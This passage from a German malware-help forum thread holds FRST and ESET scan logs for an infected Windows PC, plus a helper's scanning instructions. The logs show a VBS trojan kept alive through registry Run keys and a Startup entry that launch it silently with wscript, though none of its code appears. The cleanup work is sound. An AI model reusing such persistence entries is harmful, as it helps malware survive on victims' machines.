(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-17 00:04 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-17 00:04 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

==================== One Month Modified Files and Folders =======

2014-04-17 00:05 - 2014-04-17 00:04 - 00015773 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-17 00:04 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-17 00:02 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-17 00:01 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-17 00:01 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-17 00:01 - 2009-07-14 06:51 - 00088288 _____ () C:\Windows\setupact.log
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-17 00:00 - 2013-04-16 19:13 - 01625695 _____ () C:\Windows\WindowsUpdate.log
2014-04-17 00:00 - 2010-05-11 01:15 - 00113344 _____ () C:\Windows\PFRO.log
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:53 - 2014-04-16 23:53 - 00000728 _____ () C:\Users\Franz\Desktop\JRT.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:40 - 2014-04-16 23:40 - 00001134 _____ () C:\Users\Franz\Desktop\mbam.txt
2014-04-16 23:30 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-15 08:31 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 11:21 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-14 11:21 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-14 11:21 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================
         
--- --- ---

Alt 17.04.2014, 20:35   #8
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs




ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.

und ein frisches FRST log bitte. Noch Probleme?
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 17.04.2014, 23:48   #9
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Habe alles so gemacht wie geschildert, aber dadurch wurde ja jetzt nichts entfernt oder?
Virus ist weiterhin vorhanden, sichtbar auch im FRST-Log, die .vbs erscheint nach formatieren wieder auf dem USB-Stick, auch wenn der Pfad im ESET-Log nicht auftaucht

ESET-Log:
Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=ac2dffd99c948343bad200af6691bd9b
# engine=17931
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-04-17 08:53:19
# local_time=2014-04-17 10:53:19 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7600 NT 
# compatibility_mode=1799 16775165 100 96 2348631 31625798 2958932 0
# compatibility_mode=5893 16776574 100 94 31600355 149397849 0 0
# scanned=203094
# found=4
# cleaned=0
# scan_time=5260
sh=410B32FD3FE4642644AD91AC60C69B86EC2762DD ft=1 fh=0e378a435beab91a vn="a variant of Win32/Adware.Yontoo.B application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Tarma Installer\{361E80BE-388B-4270-BF54-A10C2B756504}\_Setupx.dll.vir"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="VBS/Kryptik.T trojan" ac=I fn="C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
